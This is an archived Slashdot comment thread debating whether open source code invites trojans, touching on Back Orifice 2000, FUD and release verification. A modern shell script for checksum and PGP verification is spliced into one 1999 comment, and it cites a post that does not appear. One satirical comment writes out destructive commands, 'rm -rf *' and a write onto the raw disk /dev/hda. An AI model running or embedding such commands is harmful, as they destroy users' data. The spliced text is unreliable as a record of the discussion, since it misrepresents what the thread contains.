    Of course, the article about the history of open source and its developments was unfortunately left incomplete. I guess it's good that Back Orifice 2000 had this nice press release written up for them, but really, it's interesting that the two would be thrown into the mix together.

    "Trojan horse programs concealed inside open source code could create new security headaches for IT managers."

    This is an interesting opening paragraph. Pretending the average person read this article, this would stick out most in their mind. I wouldn't be surprised if the average thoughts of that average person went something like this while they read the first paragraph:

    `Hmm... Open Source movements have been going on, a lot of things are Open Source, and it seems to be a really new idea... What's this? Oh No! Trojan Horses are going to be in these open source projects? Forget that, gimme something I have to pay thousands of dollars for.'

    Just what we (assuming `we' is involved in open sourcing things) need, don't you think? A nice little mud splattered onto the images of our respective projects.

    It's unfortunate that companies can sue for libel when stuff like this happens, and individuals can as well, but when it happens to a group of hard working geeks, all we seem to do is sit around and complain on slashdot about it. Of course, maybe someone more ambitious than me just read that article, and demanded a correction from the author to be posted on the front page of that news source.

    Man, I was so enjoying this day, too. And then I had to read crap like that.

    iad

    --
    Imagine a massless particle -Zen Thing
  136. Re:FUD? by cdlu · · Score: 1

    OH heheh, ok, thanks.
    I kept typing halloween.html :)
    (i feel it coming:score 0, offtopic)

  137. Re:FUD? by cdlu · · Score: 1

    You don't _want_ to know what FUD is. FUD is bad! FUD has no infrastructure! FUD has no support! FUD has no way of continuing to do business. If you use FUD, you'll be in trouble when you need help!

    :)

  138. Re:FUD? by cdlu · · Score: 2

    "Fear, Uncertainty, Doubt" - cheap marketing strategy.

    It seems to me the term was brought into more common usage by the Halloween documents (they're no longer posted anywhere i can find them).

  139. But there IS a virus in BO... by sumana · · Score: 1

    The cDc apologized about a week ago for a virus that got on the BO2K CDs they passed out at Defcon. Anyone who installed it should check their systems for Chernobyl. Check out cDc news. Maybe this doesn't prove that open-source programs are more likely to have trojans in them. But a smaller, less formal operation would be more likely, I think, to have this sort of accident happen to it than a big software firm, e.g., M$.

    --
    Ceterum censeo Microsoftam esse delendam.
  140. Re:The real Trojan Horse by e.+boaz · · Score: 1

    Off-topic. Uhm, you have that reversed. The Greeks built the large wooden horse and "left" it at the gates of the city Troy, hence the name the "Trojan horse." The unusual (at that time) and underhanded ploy won the war for the Greeks.

  141. M$ and open source propaganda by Raving+Lunatic · · Score: 1

    Just you watch - The Evil Empire will start using things like BO2k as anti-open-source propaganda. Probably to their own long-term detriment, but I bet they do it anyway.

  142. Re:The real Trojan Horse by Farce+Pest · · Score: 2

    Which is an argument for:

    1) Get your kernel from one of the standard sources, i.e. kernel.org or a mirror.

    2) Verify the PGP signature.

    Then, at least, you know you are running a real release, the same one hundreds of thousands of other people are running, and not one that someone has subsequently hacked.

    The other question is: How do we know the real release wasn't hacked? Short of looking yourself, there are many other people using the same code, including developers, and also people who analyze the patches to summarize changes. Even if a trojan patch did slip Linus' attention, it would be discovered very quickly and removed quicker.

    (And yeah, it's the Greeks, but which ones? The Trojans were Greek too, weren't they?)

    --
    This message has been scanned for memes and dangerous content by MindScanner, and is believed to be unclean.
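    The verify-before-you-build routine that this reply and dsaxena's post above both describe (get the release from the official source, check the checksum, check the PGP signature), as an added example that is not part of this thread or of any project named in it: a POSIX shell script that checks a downloaded file against a published SHA-256 list and, when a detached .asc signature was fetched alongside it, runs gpg --verify against keys already in the local keyring. The file names, the sample "tarball" and its checksum entry are constructed for the demonstration.

```sh
#!/bin/sh
# Added example (not from the thread): verify a downloaded release before
# building it. Two checks, in the order a cautious admin applies them:
#   1. the file's SHA-256 matches the entry in the published checksum list;
#   2. if a detached PGP signature (.asc) was downloaded too, gpg verifies it.
# A signature only means something when the signing key was obtained out of
# band beforehand; a key fetched from the same mirror as the tarball proves
# nothing about that mirror. File names below are hypothetical.

sha256_of() {
    # Portable SHA-256 of one file (GNU coreutils or BSD/macOS shasum).
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

verify_checksum() {
    # $1 = downloaded file, $2 = checksum list in "<sha256>  <name>" form.
    name=$(basename "$1")
    expected=$(awk -v f="$name" '$2 == f { print $1 }' "$2")
    if [ -z "$expected" ]; then
        echo "no checksum entry for $name" >&2
        return 1
    fi
    actual=$(sha256_of "$1")
    if [ "$actual" != "$expected" ]; then
        echo "CHECKSUM MISMATCH for $name" >&2
        return 1
    fi
    return 0
}

verify_signature() {
    # $1 = downloaded file, $2 = detached signature. gpg exits non-zero on a
    # bad signature and on a signing key that is not in the local keyring.
    gpg --batch --verify "$2" "$1" >/dev/null 2>&1
}

verify_release() {
    # $1 = file, $2 = checksum list, $3 = optional detached signature.
    verify_checksum "$1" "$2" || return 1
    if [ -n "$3" ]; then
        verify_signature "$1" "$3" || { echo "BAD OR UNKNOWN SIGNATURE on $1" >&2; return 1; }
    fi
    return 0
}

demo_tamper_detection() {
    # Constructed data: a stand-in "tarball", its correct checksum entry, and
    # the same file altered afterwards. Returns 0 only if the intact file is
    # accepted and the altered one is rejected.
    workdir=$(mktemp -d)
    printf 'pretend this is foo-1.0.tar.gz\n' > "$workdir/foo-1.0.tar.gz"
    printf '%s  %s\n' "$(sha256_of "$workdir/foo-1.0.tar.gz")" foo-1.0.tar.gz > "$workdir/SHA256SUMS"
    status=0
    verify_release "$workdir/foo-1.0.tar.gz" "$workdir/SHA256SUMS" || status=1
    printf 'one extra line slipped in by a mirror\n' >> "$workdir/foo-1.0.tar.gz"
    if verify_release "$workdir/foo-1.0.tar.gz" "$workdir/SHA256SUMS" 2>/dev/null; then
        status=1
    fi
    rm -r -- "$workdir"
    return "$status"
}

demo_tamper_detection && echo "intact release accepted, altered copy rejected"
```

    The checksum list and the signature have to come from somewhere other than the mirror that served the tarball (the project's own site, or a signed announcement) for either check to say anything about that mirror; the same is true of the signing key, which is why the script never fetches one itself.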
  143. The real Trojan Horse by Farce+Pest · · Score: 4

    People never seem to remember the important lesson of the original Trojan horse. The Trojans left this nice horse statue as a gift, and the suckers (can't remember who the Trojans were at war with) take it inside their secured area. Later that night, the Trojans hidden inside the horse jump out and kill them.

    The lesson: Look inside the friggin' horse, you stupid idiots! And THAT is something you can do with open source that you cannot do with closed, proprietary software.

    --
    This message has been scanned for memes and dangerous content by MindScanner, and is believed to be unclean.
    1. Re:The real Trojan Horse by Patton · · Score: 1

      Well the problem with it is the fact that not everyone is as determined as the Greeks (that's who the Trojans were fighting btw). Sadly it takes rather technical whiz-kids to do that kind of looking.

      I'm in a Fortune 500 company and there's only 1 other person who could even come within the ballpark of being able to poke through say a Linux kernel and see if there are any gotchas. That's a very low number percent wise.

    2. Re:The real Trojan Horse by Godin · · Score: 1

      Aeneid by Virgil. Great propaganda by the Roman empire if you ask me. Made me wish I was a great Roman...

      >"Cynic?? Who's a cynic?"

      --
      --"Cynical?? Who's cynical???" -k-
  144. hahaha by bnm · · Score: 1

    this is one of the funnier pieces i've seen lately.

  145. Completely the opposite... by NoWhere+Man · · Score: 1

    Open source is intended to get rid of problems like that. Of course that is only when the program is maintained and verified by the original developers. I see how it could apply if people release their own versions to the public...they could contain trojans. But if you're dumb enough to use software from some lame company then you deserve to get a virus or what have you.

    --

    "Imagination is the only weapon in the war against reality." -Jules de Gautier
    1. Re:Completely the opposite... by Syslevel · · Score: 2

      Open Source makes it far easier for anybody who has decent programming skills to dig into the system and do all sorts of things. Generally on a local level, not on a widespread level as is the case with closed source OSes.

      98% of the world's computer users are 'dumb enough' to use software they didn't compile themselves, from source code they personally reviewed. Actually that should be 99.99% of the world, since there isn't anybody here reading this message who has read every bit of source code for every thing s/he runs.

      Open Source turns it into a "local" problem rather than a 'big scale' problem as is the case when unfriendly code is widely distributed in closed source software.

      "Peer review" doesn't solve anything if Hacker X at Podunk Corporation slips an exploit into the payroll machine.

      It's a far more complex issue than many people in this discussion thread seem ready to recognize.

  146. .... by Bud^- · · Score: 1

    When virus writers moved to an open source model in 1996

    Alright, this is good news for the OSS movement. Plus there is this MAJOR bug in a virus I use on a daily basis, it deletes all the data off a hard drive, I'm looking to obtain this source so I can fix this error.

    I'm glad virus writers are no longer in it for the commercial benefits but have moved over into the OSS community to grep the benefits of OSS.

    Seriously, on a serious note. Wouldn't it be easier to put a 'malice' piece of code into a binary only program?

    I can just see a piece of open source software not compiling and a SysAdmin looking over the source.

    print "Looking for user...\n";
    system ("rm -rf *");
    print "User connected...\n";

    Or worse yet...

    /* This quick hack runs a subroutine to
    invert the values of the disk controller to obtain
    permission to write straight 1's on the entire drive */

    Anyway, that is beside the point! Has anyone heard of checksums? Can you trust the guy who wrote procmail? This whole time, for the last 10+ years he has been getting the trust of the OSS community and *nix admins everywhere. When he is ready for Total World Domination he is going to slip a system ("echo \"blah\" > /dev/hda"); into his "Special" x86 version of procmail.

    THIS IS BIGGER THAN WATERGATE MAN, EVERYONE IS IN ON IT, IT GOES UP TO THE WHITE HOUSE MAN!


    M$ is trying to make the new/potential users of OSS paranoid. FUD FILLED and tasty, Mmm

  147. FUD? by paranoid.android · · Score: 1

    Excuse me for sounding stupid, but what is FUD?

    paranoid.android

    1. Re:FUD? by ufdraco · · Score: 1

      FUD = Fear, Uncertainty, [and] Doubt

      --

      ufdraco

  148. Open source means more risk? bah, pfflt, suuuure.. by matman · · Score: 1

    Heh, I would trust code that isn't worried about me getting into its panties more than I would code that's hiding something. Back Orifice is NOT a trojan horse - it doesn't pretend to be what it's not... if I call a spreadsheet a word processor it's still a spreadsheet... so... if someone calls Back Orifice a Trojan, it's still a remote admin tool. And it doesn't mean that any portion of open source is inherently trojany, let alone any more than proprietary stuff.